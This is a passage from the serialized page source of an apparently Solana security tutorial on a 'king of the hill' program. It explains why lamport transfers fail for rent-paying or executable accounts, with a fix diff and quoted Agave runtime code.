pre_lamports",{"type":26,"tag":137,"props":75374,"children":75375},{"style":5601},[75376],{"type":32,"value":6099},{"type":26,"tag":137,"props":75378,"children":75379},{"class":5559,"line":6208},[75380,75385,75389],{"type":26,"tag":137,"props":75381,"children":75382},{"style":5601},[75383],{"type":32,"value":75384},"                    } ",{"type":26,"tag":137,"props":75386,"children":75387},{"style":5590},[75388],{"type":32,"value":17413},{"type":26,"tag":137,"props":75390,"children":75391},{"style":5601},[75392],{"type":32,"value":5875},{"type":26,"tag":137,"props":75394,"children":75395},{"class":5559,"line":6225},[75396],{"type":26,"tag":137,"props":75397,"children":75398},{"style":5564},[75399],{"type":32,"value":75400},"                        // Cannot remain RentPaying if resized or credited.\n",{"type":26,"tag":137,"props":75402,"children":75403},{"class":5559,"line":6238},[75404,75409,75413,75417,75421,75425,75429],{"type":26,"tag":137,"props":75405,"children":75406},{"style":5584},[75407],{"type":32,"value":75408},"                        post_data_size",{"type":26,"tag":137,"props":75410,"children":75411},{"style":5590},[75412],{"type":32,"value":5866},{"type":26,"tag":137,"props":75414,"children":75415},{"style":5584},[75416],{"type":32,"value":75351},{"type":26,"tag":137,"props":75418,"children":75419},{"style":5590},[75420],{"type":32,"value":16776},{"type":26,"tag":137,"props":75422,"children":75423},{"style":5584},[75424],{"type":32,"value":75235},{"type":26,"tag":137,"props":75426,"children":75427},{"style":5590},[75428],{"type":32,"value":10782},{"type":26,"tag":137,"props":75430,"children":75431},{"style":5584},[75432],{"type":32,"value":75433}," pre_lamports\n",{"type":26,"tag":137,"props":75435,"children":75436},{"class":5559,"line":6247},[75437],{"type":26,"tag":137,"props":75438,"children":75439},{"style":5601},[75440],{"type":32,"value":73664},{"type":26,"tag":137,"props":75442,"children":75443},{"class":5559,"line":6270},[75444],{"type":26,"tag":137,"props":75445,"children":75446},{"style":5601},[75447],{"type":32,"value":73672},{"type":26,"tag":137,"props":75449,"children":75450},{"class":5559,"line":6279},[75451],{"type":26,"tag":137,"props":75452,"children":75453},{"style":5601},[75454],{"type":32,"value":61486},{"type":26,"tag":137,"props":75456,"children":75457},{"class":5559,"line":6288},[75458],{"type":26,"tag":137,"props":75459,"children":75460},{"style":5601},[75461],{"type":32,"value":5936},{"type":26,"tag":137,"props":75463,"children":75464},{"class":5559,"line":6355},[75465],{"type":26,"tag":137,"props":75466,"children":75467},{"style":5601},[75468],{"type":32,"value":5945},{"type":26,"tag":35,"props":75470,"children":75471},{},[75472],{"type":32,"value":75473},"You can check the rent-exemption threshold for a zero-data account with the CLI:",{"type":26,"tag":5512,"props":75475,"children":75477},{"className":6823,"code":75476,"language":6822,"meta":7,"style":7},"solana rent 0\nRent-exempt minimum: 0.00089088 SOL\n",[75478],{"type":26,"tag":130,"props":75479,"children":75480},{"__ignoreMap":7},[75481,75497],{"type":26,"tag":137,"props":75482,"children":75483},{"class":5559,"line":5560},[75484,75488,75493],{"type":26,"tag":137,"props":75485,"children":75486},{"style":5682},[75487],{"type":32,"value":5450},{"type":26,"tag":137,"props":75489,"children":75490},{"style":6837},[75491],{"type":32,"value":75492}," rent",{"type":26,"tag":137,"props":75494,"children":75495},{"style":5626},[75496],{"type":32,"value":26870},{"type":26,"tag":137,"props":75498,"children":75499},{"class":5559,"line":5412},[75500,75505,75510,75515],{"type":26,"tag":137,"props":75501,"children":75502},{"style":5682},[75503],{"type":32,"value":75504},"Rent-exempt",{"type":26,"tag":137,"props":75506,"children":75507},{"style":6837},[75508],{"type":32,"value":75509}," minimum:",{"type":26,"tag":137,"props":75511,"children":75512},{"style":5626},[75513],{"type":32,"value":75514}," 0.00089088",{"type":26,"tag":137,"props":75516,"children":75517},{"style":6837},[75518],{"type":32,"value":75519}," SOL\n",{"type":26,"tag":21485,"props":75521,"children":75523},{"id":75522},"fix-1-only-reimburse-if-rent-exempt",[75524],{"type":32,"value":75525},"Fix 1: Only Reimburse if Rent-Exempt",{"type":26,"tag":35,"props":75527,"children":75528},{},[75529],{"type":32,"value":75530},"We don't want to donate anything to an unfair king! So let's update our program to reimburse only if the old king will be rent-exempt after the transfer:",{"type":26,"tag":5512,"props":75532,"children":75534},{"className":42957,"code":75533,"language":42959,"meta":7,"style":7},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n+let rent = Rent::get()?;\n+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n    transfer_from_pda(\n        &ctx.accounts.throne.to_account_info(),\n        &ctx.accounts.old_king,\n        to_reimburse,\n    )?;\n+}\n",[75535],{"type":26,"tag":130,"props":75536,"children":75537},{"__ignoreMap":7},[75538,75546,75554,75562,75570,75578,75586,75594,75602,75610],{"type":26,"tag":137,"props":75539,"children":75540},{"class":5559,"line":5560},[75541],{"type":26,"tag":137,"props":75542,"children":75543},{"style":5601},[75544],{"type":32,"value":75545},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n",{"type":26,"tag":137,"props":75547,"children":75548},{"class":5559,"line":5412},[75549],{"type":26,"tag":137,"props":75550,"children":75551},{"style":5626},[75552],{"type":32,"value":75553},"+let rent = Rent::get()?;\n",{"type":26,"tag":137,"props":75555,"children":75556},{"class":5559,"line":5417},[75557],{"type":26,"tag":137,"props":75558,"children":75559},{"style":5626},[75560],{"type":32,"value":75561},"+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n",{"type":26,"tag":137,"props":75563,"children":75564},{"class":5559,"line":5642},[75565],{"type":26,"tag":137,"props":75566,"children":75567},{"style":5626},[75568],{"type":32,"value":75569},"+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n",{"type":26,"tag":137,"props":75571,"children":75572},{"class":5559,"line":5745},[75573],{"type":26,"tag":137,"props":75574,"children":75575},{"style":5601},[75576],{"type":32,"value":75577},"    transfer_from_pda(\n",{"type":26,"tag":137,"props":75579,"children":75580},{"class":5559,"line":5850},[75581],{"type":26,"tag":137,"props":75582,"children":75583},{"style":5601},[75584],{"type":32,"value":75585},"        &ctx.accounts.throne.to_account_info(),\n",{"type":26,"tag":137,"props":75587,"children":75588},{"class":5559,"line":5878},[75589],{"type":26,"tag":137,"props":75590,"children":75591},{"style":5601},[75592],{"type":32,"value":75593},"        &ctx.accounts.old_king,\n",{"type":26,"tag":137,"props":75595,"children":75596},{"class":5559,"line":5891},[75597],{"type":26,"tag":137,"props":75598,"children":75599},{"style":5601},[75600],{"type":32,"value":75601},"        to_reimburse,\n",{"type":26,"tag":137,"props":75603,"children":75604},{"class":5559,"line":5909},[75605],{"type":26,"tag":137,"props":75606,"children":75607},{"style":5601},[75608],{"type":32,"value":75609},"    )?;\n",{"type":26,"tag":137,"props":75611,"children":75612},{"class":5559,"line":5930},[75613],{"type":26,"tag":137,"props":75614,"children":75615},{"style":5626},[75616],{"type":32,"value":75617},"+}\n",{"type":26,"tag":35,"props":75619,"children":75620},{},[75621],{"type":32,"value":75622},"But is rent-exemption the only thing that can cause a lamport transfer to fail? Not quite.",{"type":26,"tag":118,"props":75624,"children":75626},{"id":75625},"bug-2-writable-but-untouchable-set_lamports-fails",[75627,75629,75635],{"type":32,"value":75628},"Bug 2: Writable but Untouchable — ",{"type":26,"tag":130,"props":75630,"children":75632},{"className":75631},[],[75633],{"type":32,"value":75634},"set_lamports",{"type":32,"value":75636}," Fails",{"type":26,"tag":35,"props":75638,"children":75639},{},[75640,75642,75649],{"type":32,"value":75641},"Let's look at ",{"type":26,"tag":41,"props":75643,"children":75646},{"href":75644,"rel":75645},"https://github.com/anza-xyz/agave/blob/f389dd23067e37d756c3f9d2f3d50e339dad7053/transaction-context/src/lib.rs#L863-L885",[45],[75647],{"type":32,"value":75648},"BorrowedAccount::set_lamports",{"type":32,"value":470},{"type":26,"tag":5512,"props":75651,"children":75653},{"className":5552,"code":75652,"language":5551,"meta":7,"style":7},"/// Overwrites the number of lamports of this account (transaction wide)\n#[cfg(not(target_os = \"solana\"))]\npub fn set_lamports(&mut self, lamports: u64) -> Result\u003C(), InstructionError> {\n    // An account not owned by the program cannot have its balance decrease\n    if !self.is_owned_by_current_program() && lamports \u003C self.get_lamports() {\n        return Err(InstructionError::ExternalAccountLamportSpend);\n    }\n    // The balance of read-only may not change\n    if !self.is_writable() {\n        return Err(InstructionError::ReadonlyLamportChange);\n    }\n    // The balance of executable accounts may not change\n    if self.is_executable_internal() {\n        return Err(InstructionError::ExecutableLamportChange);\n    }\n    // don't touch the account if the lamports do not change\n    if self.get_lamports() == lamports {\n        return Ok(());\n    }\n    self.touch()?;\n    self.account.set_lamports(lamports);\n    Ok(())\n}\n\n/// Feature gating to remove `is_executable` flag related checks\n#[cfg(not(target_os = \"solana\"))]\n#[inline]\nfn is_executable_internal(&self) -> bool {\n    !self\n        .transaction_context\n        .remove_accounts_executable_flag_checks\n        && self.account.executable()\n}\n\n",[75654],{"type":26,"tag":130,"props":75655,"children":75656},{"__ignoreMap":7},[75657,75665,75686,75758,75766,75825,75857,75864,75872,75900,75932,75939,75947,75971,76003,76010,76018,76053,76069,76076,76104,76139,76150,76157,76164,76172,76191,76199,76239,76251,76263,76275,76306],{"type":26,"tag":137,"props":75658,"children":75659},{"class":5559,"line":5560},[75660],{"type":26,"tag":137,"props":75661,"children":75662},{"style":5564},[75663],{"type":32,"value":75664},"/// Overwrites the number of lamports of this account (transaction wide)\n",{"type":26,"tag":137,"props":75666,"children":75667},{"class":5559,"line":5412},[75668,75673,75677,75682],{"type":26,"tag":137,"props":75669,"children":75670},{"style":5601},[75671],{"type":32,"value":75672},"#[cfg(not(target_os ",{"type":26,"tag":137,"props":75674,"children":75675},{"style":5590},[75676],{"type":32,"value":289},{"type":26,"tag":137,"props":75678,"children":75679},{"style":6837},[75680],{"type":32,"value":75681}," \"solana\"",{"type":26,"tag":137,"props":75683,"children":75684},{"style":5601},[75685],{"type":32,"value":23202},{"type":26,"tag":137,"props":75687,"children":75688},{"class":5559,"line":5417},[75689,75693,75697,75702,75706,75710,75714,75718,75722,75726,75730,75734,75738,75742,75746,75750,75754],{"type":26,"tag":137,"props":75690,"children":75691},{"style":5573},[75692],{"type":32,"value":16281},{"type":26,"tag":137,"props":75694,"children":75695},{"style":5573},[75696],{"type":32,"value":16286},{"type":26,"tag":137,"props":75698,"children":75699},{"style":5682},[75700],{"type":32,"value":75701}," set_lamports",{"type":26,"tag":137,"props":75703,"children":75704},{"style":5601},[75705],{"type":32,"value":165},{"type":26,"tag":137,"props":75707,"children":75708},{"style":5590},[75709],{"type":32,"value":5694},{"type":26,"tag":137,"props":75711,"children":75712},{"style":5573},[75713],{"type":32,"value":6325},{"type":26,"tag":137,"props":75715,"children":75716},{"style":5573},[75717],{"type":32,"value":16388},{"type":26,"tag":137,"props":75719,"children":75720},{"style":5601},[75721],{"type":32,"value":1108},{"type":26,"tag":137,"props":75723,"children":75724},{"style":5584},[75725],{"type":32,"value":18103},{"type":26,"tag":137,"props":75727,"children":75728},{"style":5590},[75729],{"type":32,"value":7072},{"type":26,"tag":137,"props":75731,"children":75732},{"style":6009},[75733],{"type":32,"value":8445},{"type":26,"tag":137,"props":75735,"children":75736},{"style":5601},[75737],{"type":32,"value":5671},{"type":26,"tag":137,"props":75739,"children":75740},{"style":5590},[75741],{"type":32,"value":16348},{"type":26,"tag":137,"props":75743,"children":75744},{"style":6009},[75745],{"type":32,"value":16353},{"type":26,"tag":137,"props":75747,"children":75748},{"style":5601},[75749],{"type":32,"value":16358},{"type":26,"tag":137,"props":75751,"children":75752},{"style":6009},[75753],{"type":32,"value":18350},{"type":26,"tag":137,"props":75755,"children":75756},{"style":5601},[75757],{"type":32,"value":9865},{"type":26,"tag":137,"props":75759,"children":75760},{"class":5559,"line":5642},[75761],{"type":26,"tag":137,"props":75762,"children":75763},{"style":5564},[75764],{"type":32,"value":75765},"    // An account not owned by the program cannot have its balance decrease\n",{"type":26,"tag":137,"props":75767,"children":75768},{"class":5559,"line":5745},[75769,75773,75777,75781,75785,75790,75794,75799,75804,75808,75812,75816,75821],{"type":26,"tag":137,"props":75770,"children":75771},{"style":5610},[75772],{"type":32,"value":14870},{"type":26,"tag":137,"props":75774,"children":75775},{"style":5590},[75776],{"type":32,"value":15455},{"type":26,"tag":137,"props":75778,"children":75779},{"style":5573},[75780],{"type":32,"value":16304},{"type":26,"tag":137,"props":75782,"children":75783},{"style":5590},[75784],{"type":32,"value":470},{"type":26,"tag":137,"props":75786,"children":75787},{"style":5682},[75788],{"type":32,"value":75789},"is_owned_by_current_program",{"type":26,"tag":137,"props":75791,"children":75792},{"style":5601},[75793],{"type":32,"value":16634},{"type":26,"tag":137,"props":75795,"children":75796},{"style":5590},[75797],{"type":32,"value":75798},"&&",{"type":26,"tag":137,"props":75800,"children":75801},{"style":5584},[75802],{"type":32,"value":75803}," lamports",{"type":26,"tag":137,"props":75805,"children":75806},{"style":5590},[75807],{"type":32,"value":11305},{"type":26,"tag":137,"props":75809,"children":75810},{"style":5573},[75811],{"type":32,"value":16388},{"type":26,"tag":137,"props":75813,"children":75814},{"style":5590},[75815],{"type":32,"value":470},{"type":26,"tag":137,"props":75817,"children":75818},{"style":5682},[75819],{"type":32,"value":75820},"get_lamports",{"type":26,"tag":137,"props":75822,"children":75823},{"style":5601},[75824],{"type":32,"value":18328},{"type":26,"tag":137,"props":75826,"children":75827},{"class":5559,"line":5850},[75828,75832,75836,75840,75844,75848,75853],{"type":26,"tag":137,"props":75829,"children":75830},{"style":5610},[75831],{"type":32,"value":18336},{"type":26,"tag":137,"props":75833,"children":75834},{"style":6009},[75835],{"type":32,"value":18341},{"type":26,"tag":137,"props":75837,"children":75838},{"style":5601},[75839],{"type":32,"value":165},{"type":26,"tag":137,"props":75841,"children":75842},{"style":6009},[75843],{"type":32,"value":18350},{"type":26,"tag":137,"props":75845,"children":75846},{"style":5590},[75847],{"type":32,"value":6072},{"type":26,"tag":137,"props":75849,"children":75850},{"style":6009},[75851],{"type":32,"value":75852},"ExternalAccountLamportSpend",{"type":26,"tag":137,"props":75854,"children":75855},{"style":5601},[75856],{"type":32,"value":6430},{"type":26,"tag":137,"props":75858,"children":75859},{"class":5559,"line":5878},[75860],{"type":26,"tag":137,"props":75861,"children":75862},{"style":5601},[75863],{"type":32,"value":5945},{"type":26,"tag":137,"props":75865,"children":75866},{"class":5559,"line":5891},[75867],{"type":26,"tag":137,"props":75868,"children":75869},{"style":5564},[75870],{"type":32,"value":75871},"    // The balance of read-only may not change\n",{"type":26,"tag":137,"props":75873,"children":75874},{"class":5559,"line":5909},[75875,75879,75883,75887,75891,75896],{"type":26,"tag":137,"props":75876,"children":75877},{"style":5610},[75878],{"type":32,"value":14870},{"type":26,"tag":137,"props":75880,"children":75881},{"style":5590},[75882],{"type":32,"value":15455},{"type":26,"tag":137,"props":75884,"children":75885},{"style":5573},[75886],{"type":32,"value":16304},{"type":26,"tag":137,"props":75888,"children":75889},{"style":5590},[75890],{"type":32,"value":470},{"type":26,"tag":137,"props":75892,"children":75893},{"style":5682},[75894],{"type":32,"value":75895},"is_writable",{"type":26,"tag":137,"props":75897,"children":75898},{"style":5601},[75899],{"type":32,"value":18328},{"type":26,"tag":137,"props":75901,"children":75902},{"class":5559,"line":5930},[75903,75907,75911,75915,75919,75923,75928],{"type":26,"tag":137,"props":75904,"children":75905},{"style":5610},[75906],{"type":32,"value":18336},{"type":26,"tag":137,"props":75908,"children":75909},{"style":6009},[75910],{"type":32,"value":18341},{"type":26,"tag":137,"props":75912,"children":75913},{"style":5601},[75914],{"type":32,"value":165},{"type":26,"tag":137,"props":75916,"children":75917},{"style":6009},[75918],{"type":32,"value":18350},{"type":26,"tag":137,"props":75920,"children":75921},{"style":5590},[75922],{"type":32,"value":6072},{"type":26,"tag":137,"props":75924,"children":75925},{"style":6009},[75926],{"type":32,"value":75927},"ReadonlyLamportChange",{"type":26,"tag":137,"props":75929,"children":75930},{"style":5601},[75931],{"type":32,"value":6430},{"type":26,"tag":137,"props":75933,"children":75934},{"class":5559,"line":5939},[75935],{"type":26,"tag":137,"props":75936,"children":75937},{"style":5601},[75938],{"type":32,"value":5945},{"type":26,"tag":137,"props":75940,"children":75941},{"class":5559,"line":6191},[75942],{"type":26,"tag":137,"props":75943,"children":75944},{"style":5564},[75945],{"type":32,"value":75946},"    // The balance of executable accounts may not change\n",{"type":26,"tag":137,"props":75948,"children":75949},{"class":5559,"line":6208},[75950,75954,75958,75962,75967],{"type":26,"tag":137,"props":75951,"children":75952},{"style":5610},[75953],{"type":32,"value":14870},{"type":26,"tag":137,"props":75955,"children":75956},{"style":5573},[75957],{"type":32,"value":16388},{"type":26,"tag":137,"props":75959,"children":75960},{"style":5590},[75961],{"type":32,"value":470},{"type":26,"tag":137,"props":75963,"children":75964},{"style":5682},[75965],{"type":32,"value":75966},"is_executable_internal",{"type":26,"tag":137,"props":75968,"children":75969},{"style":5601},[75970],{"type":32,"value":18328},{"type":26,"tag":137,"props":75972,"children":75973},{"class":5559,"line":6225},[75974,75978,75982,75986,75990,75994,75999],{"type":26,"tag":137,"props":75975,"children":75976},{"style":5610},[75977],{"type":32,"value":18336},{"type":26,"tag":137,"props":75979,"children":75980},{"style":6009},[75981],{"type":32,"value":18341},{"type":26,"tag":137,"props":75983,"children":75984},{"style":5601},[75985],{"type":32,"value":165},{"type":26,"tag":137,"props":75987,"children":75988},{"style":6009},[75989],{"type":32,"value":18350},{"type":26,"tag":137,"props":75991,"children":75992},{"style":5590},[75993],{"type":32,"value":6072},{"type":26,"tag":137,"props":75995,"children":75996},{"style":6009},[75997],{"type":32,"value":75998},"ExecutableLamportChange",{"type":26,"tag":137,"props":76000,"children":76001},{"style":5601},[76002],{"type":32,"value":6430},{"type":26,"tag":137,"props":76004,"children":76005},{"class":5559,"line":6238},[76006],{"type":26,"tag":137,"props":76007,"children":76008},{"style":5601},[76009],{"type":32,"value":5945},{"type":26,"tag":137,"props":76011,"children":76012},{"class":5559,"line":6247},[76013],{"type":26,"tag":137,"props":76014,"children":76015},{"style":5564},[76016],{"type":32,"value":76017},"    // don't touch the account if the lamports do not change\n",{"type":26,"tag":137,"props":76019,"children":76020},{"class":5559,"line":6270},[76021,76025,76029,76033,76037,76041,76045,76049],{"type":26,"tag":137,"props":76022,"children":76023},{"style":5610},[76024],{"type":32,"value":14870},{"type":26,"tag":137,"props":76026,"children":76027},{"style":5573},[76028],{"type":32,"value":16388},{"type":26,"tag":137,"props":76030,"children":76031},{"style":5590},[76032],{"type":32,"value":470},{"type":26,"tag":137,"props":76034,"children":76035},{"style":5682},[76036],{"type":32,"value":75820},{"type":26,"tag":137,"props":76038,"children":76039},{"style":5601},[76040],{"type":32,"value":16634},{"type":26,"tag":137,"props":76042,"children":76043},{"style":5590},[76044],{"type":32,"value":11161},{"type":26,"tag":137,"props":76046,"children":76047},{"style":5584},[76048],{"type":32,"value":75803},{"type":26,"tag":137,"props":76050,"children":76051},{"style":5601},[76052],{"type":32,"value":5875},{"type":26,"tag":137,"props":76054,"children":76055},{"class":5559,"line":6279},[76056,76060,76064],{"type":26,"tag":137,"props":76057,"children":76058},{"style":5610},[76059],{"type":32,"value":18336},{"type":26,"tag":137,"props":76061,"children":76062},{"style":6009},[76063],{"type":32,"value":45535},{"type":26,"tag":137,"props":76065,"children":76066},{"style":5601},[76067],{"type":32,"value":76068},"(());\n",{"type":26,"tag":137,"props":76070,"children":76071},{"class":5559,"line":6288},[76072],{"type":26,"tag":137,"props":76073,"children":76074},{"style":5601},[76075],{"type":32,"value":5945},{"type":26,"tag":137,"props":76077,"children":76078},{"class":5559,"line":6355},[76079,76083,76087,76092,76096,76100],{"type":26,"tag":137,"props":76080,"children":76081},{"style":5573},[76082],{"type":32,"value":23379},{"type":26,"tag":137,"props":76084,"children":76085},{"style":5590},[76086],{"type":32,"value":470},{"type":26,"tag":137,"props":76088,"children":76089},{"style":5682},[76090],{"type":32,"value":76091},"touch",{"type":26,"tag":137,"props":76093,"children":76094},{"style":5601},[76095],{"type":32,"value":16470},{"type":26,"tag":137,"props":76097,"children":76098},{"style":5590},[76099],{"type":32,"value":5737},{"type":26,"tag":137,"props":76101,"children":76102},{"style":5601},[76103],{"type":32,"value":5604},{"type":26,"tag":137,"props":76105,"children":76106},{"class":5559,"line":6363},[76107,76111,76115,76119,76123,76127,76131,76135],{"type":26,"tag":137,"props":76108,"children":76109},{"style":5573},[76110],{"type":32,"value":23379},{"type":26,"tag":137,"props":76112,"children":76113},{"style":5590},[76114],{"type":32,"value":470},{"type":26,"tag":137,"props":76116,"children":76117},{"style":5601},[76118],{"type":32,"value":15544},{"type":26,"tag":137,"props":76120,"children":76121},{"style":5590},[76122],{"type":32,"value":470},{"type":26,"tag":137,"props":76124,"children":76125},{"style":5682},[76126],{"type":32,"value":75634},{"type":26,"tag":137,"props":76128,"children":76129},{"style":5601},[76130],{"type":32,"value":165},{"type":26,"tag":137,"props":76132,"children":76133},{"style":5584},[76134],{"type":32,"value":18103},{"type":26,"tag":137,"props":76136,"children":76137},{"style":5601},[76138],{"type":32,"value":6430},{"type":26,"tag":137,"props":76140,"children":76141},{"class":5559,"line":6393},[76142,76146],{"type":26,"tag":137,"props":76143,"children":76144},{"style":6009},[76145],{"type":32,"value":16924},{"type":26,"tag":137,"props":76147,"children":76148},{"style":5601},[76149],{"type":32,"value":16929},{"type":26,"tag":137,"props":76151,"children":76152},{"class":5559,"line":6401},[76153],{"type":26,"tag":137,"props":76154,"children":76155},{"style":5601},[76156],{"type":32,"value":6507},{"type":26,"tag":137,"props":76158,"children":76159},{"class":5559,"line":6433},[76160],{"type":26,"tag":137,"props":76161,"children":76162},{"emptyLinePlaceholder":18},[76163],{"type":32,"value":6276},{"type":26,"tag":137,"props":76165,"children":76166},{"class":5559,"line":6441},[76167],{"type":26,"tag":137,"props":76168,"children":76169},{"style":5564},[76170],{"type":32,"value":76171},"/// Feature gating to remove `is_executable` flag related checks\n",{"type":26,"tag":137,"props":76173,"children":76174},{"class":5559,"line":6501},[76175,76179,76183,76187],{"type":26,"tag":137,"props":76176,"children":76177},{"style":5601},[76178],{"type":32,"value":75672},{"type":26,"tag":137,"props":76180,"children":76181},{"style":5590},[76182],{"type":32,"value":289},{"type":26,"tag":137,"props":76184,"children":76185},{"style":6837},[76186],{"type":32,"value":75681},{"type":26,"tag":137,"props":76188,"children":76189},{"style":5601},[76190],{"type":32,"value":23202},{"type":26,"tag":137,"props":76192,"children":76193},{"class":5559,"line":11634},[76194],{"type":26,"tag":137,"props":76195,"children":76196},{"style":5601},[76197],{"type":32,"value":76198},"#[inline]\n",{"type":26,"tag":137,"props":76200,"children":76201},{"class":5559,"line":11652},[76202,76206,76211,76215,76219,76223,76227,76231,76235],{"type":26,"tag":137,"props":76203,"children":76204},{"style":5573},[76205],{"type":32,"value":22860},{"type":26,"tag":137,"props":76207,"children":76208},{"style":5682},[76209],{"type":32,"value":76210}," is_executable_internal",{"type":26,"tag":137,"props":76212,"children":76213},{"style":5601},[76214],{"type":32,"value":165},{"type":26,"tag":137,"props":76216,"children":76217},{"style":5590},[76218],{"type":32,"value":5694},{"type":26,"tag":137,"props":76220,"children":76221},{"style":5573},[76222],{"type":32,"value":16304},{"type":26,"tag":137,"props":76224,"children":76225},{"style":5601},[76226],{"type":32,"value":5671},{"type":26,"tag":137,"props":76228,"children":76229},{"style":5590},[76230],{"type":32,"value":16348},{"type":26,"tag":137,"props":76232,"children":76233},{"style":6009},[76234],{"type":32,"value":14641},{"type":26,"tag":137,"props":76236,"children":76237},{"style":5601},[76238],{"type":32,"value":5875},{"type":26,"tag":137,"props":76240,"children":76241},{"class":5559,"line":11697},[76242,76246],{"type":26,"tag":137,"props":76243,"children":76244},{"style":5590},[76245],{"type":32,"value":23563},{"type":26,"tag":137,"props":76247,"children":76248},{"style":5573},[76249],{"type":32,"value":76250},"self\n",{"type":26,"tag":137,"props":76252,"children":76253},{"class":5559,"line":11803},[76254,76258],{"type":26,"tag":137,"props":76255,"children":76256},{"style":5590},[76257],{"type":32,"value":70861},{"type":26,"tag":137,"props":76259,"children":76260},{"style":5601},[76261],{"type":32,"value":76262},"transaction_context\n",{"type":26,"tag":137,"props":76264,"children":76265},{"class":5559,"line":26089},[76266,76270],{"type":26,"tag":137,"props":76267,"children":76268},{"style":5590},[76269],{"type":32,"value":70861},{"type":26,"tag":137,"props":76271,"children":76272},{"style":5601},[76273],{"type":32,"value":76274},"remove_accounts_executable_flag_checks\n",{"type":26,"tag":137,"props":76276,"children":76277},{"class":5559,"line":26124},[76278,76282,76286,76290,76294,76298,76302],{"type":26,"tag":137,"props":76279,"children":76280},{"style":5590},[76281],{"type":32,"value":45399},{"type":26,"tag":137,"props":76283,"children":76284},{"style":5573},[76285],{"type":32,"value":16388},{"type":26,"tag":137,"props":76287,"children":76288},{"style":5590},[76289],{"type":32,"value":470},{"type":26,"tag":137,"props":76291,"children":76292},{"style":5601},[76293],{"type":32,"value":15544},{"type":26,"tag":137,"props":76295,"children":76296},{"style":5590},[76297],{"type":32,"value":470},{"type":26,"tag":137,"props":76299,"children":76300},{"style":5682},[76301],{"type":32,"value":18247},{"type":26,"tag":137,"props":76303,"children":76304},{"style":5601},[76305],{"type":32,"value":10320},{"type":26,"tag":137,"props":76307,"children":76308},{"class":5559,"line":26132},[76309],{"type":26,"tag":137,"props":76310,"children":76311},{"style":5601},[76312],{"type":32,"value":6507},{"type":26,"tag":35,"props":76314,"children":76315},{},[76316],{"type":32,"value":76317},"Turns out: even writable, rent-exempt accounts can still reject lamport transfers.",{"type":26,"tag":35,"props":76319,"children":76320},{},[76321,76323,76328],{"type":32,"value":76322},"Specifically, ",{"type":26,"tag":84,"props":76324,"children":76325},{},[76326],{"type":32,"value":76327},"executable accounts",{"type":32,"value":76329}," cannot receive or send lamports — the runtime treats them as immutable.",{"type":26,"tag":21485,"props":76331,"children":76333},{"id":76332},"sidebar-whats-the-executable-flag-anyway",[76334],{"type":32,"value":76335},"Sidebar: What's the executable Flag Anyway?",{"type":26,"tag":35,"props":76337,"children":76338},{},[76339,76340,76345],{"type":32,"value":19206},{"type":26,"tag":130,"props":76341,"children":76343},{"className":76342},[],[76344],{"type":32,"value":18247},{"type":32,"value":76346}," flag is a legacy mechanism marking accounts that hold program code. Historically, an account with this flag was assumed to either contain immutable BPF bytecode or was a proxy to a built-in program, and therefore it made sense to consider it read-only for performance reasons.",{"type":26,"tag":35,"props":76348,"children":76349},{},[76350,76352,76357],{"type":32,"value":76351},"This behavior became problematic with the introduction of the ",{"type":26,"tag":84,"props":76353,"children":76354},{},[76355],{"type":32,"value":76356},"Upgradeable BPF Loader",{"type":32,"value":76358},". A workaround was used to maintain compatibility with the existing runtime logic. The program data containing bpf bytecode was split into a separate account, ProgramData, with the program account now only containing an address pointing to the ProgramData account:",{"type":26,"tag":5512,"props":76360,"children":76362},{"className":5552,"code":76361,"language":5551,"meta":7,"style":7},"Program {\n    /// Address of the ProgramData account.\n    programdata_address: Pubkey,\n},\nProgramData {\n    /// Slot that the program was last modified.\n    slot: u64,\n    /// Address of the Program's upgrade authority.\n    upgrade_authority_address: Option\u003CPubkey>,\n    // The raw program data follows this serialized structure in the\n    // account's data.\n},\n",[76363],{"type":26,"tag":130,"props":76364,"children":76365},{"__ignoreMap":7},[76366,76378,76386,76406,76414,76426,76434,76454,76462,76490,76498,76506],{"type":26,"tag":137,"props":76367,"children":76368},{"class":5559,"line":5560},[76369,76374],{"type":26,"tag":137,"props":76370,"children":76371},{"style":6009},[76372],{"type":32,"value":76373},"Program",{"type":26,"tag":137,"props":76375,"children":76376},{"style":5601},[76377],{"type":32,"value":5875},{"type":26,"tag":137,"props":76379,"children":76380},{"class":5559,"line":5412},[76381],{"type":26,"tag":137,"props":76382,"children":76383},{"style":5564},[76384],{"type":32,"value":76385},"    /// Address of the ProgramData account.\n",{"type":26,"tag":137,"props":76387,"children":76388},{"class":5559,"line":5417},[76389,76394,76398,76402],{"type":26,"tag":137,"props":76390,"children":76391},{"style":5584},[76392],{"type":32,"value":76393},"    programdata_address",{"type":26,"tag":137,"props":76395,"children":76396},{"style":5590},[76397],{"type":32,"value":7072},{"type":26,"tag":137,"props":76399,"children":76400},{"style":6009},[76401],{"type":32,"value":23450},{"type":26,"tag":137,"props":76403,"children":76404},{"style":5601},[76405],{"type":32,"value":6099},{"type":26,"tag":137,"props":76407,"children":76408},{"class":5559,"line":5642},[76409],{"type":26,"tag":137,"props":76410,"children":76411},{"style":5601},[76412],{"type":32,"value":76413},"},\n",{"type":26,"tag":137,"props":76415,"children":76416},{"class":5559,"line":5745},[76417,76422],{"type":26,"tag":137,"props":76418,"children":76419},{"style":6009},[76420],{"type":32,"value":76421},"ProgramData",{"type":26,"tag":137,"props":76423,"children":76424},{"style":5601},[76425],{"type":32,"value":5875},{"type":26,"tag":137,"props":76427,"children":76428},{"class":5559,"line":5850},[76429],{"type":26,"tag":137,"props":76430,"children":76431},{"style":5564},[76432],{"type":32,"value":76433},"    /// Slot that the program was last modified.\n",{"type":26,"tag":137,"props":76435,"children":76436},{"class":5559,"line":5878},[76437,76442,76446,76450],{"type":26,"tag":137,"props":76438,"children":76439},{"style":5584},[76440],{"type":32,"value":76441},"    slot",{"type":26,"tag":137,"props":76443,"children":76444},{"style":5590},[76445],{"type":32,"value":7072},{"type":26,"tag":137,"props":76447,"children":76448},{"style":6009},[76449],{"type":32,"value":8445},{"type":26,"tag":137,"props":76451,"children":76452},{"style":5601},[76453],{"type":32,"value":6099},{"type":26,"tag":137,"props":76455,"children":76456},{"class":5559,"line":5891},[76457],{"type":26,"tag":137,"props":76458,"children":76459},{"style":5564},[76460],{"type":32,"value":76461},"    /// Address of the Program's upgrade 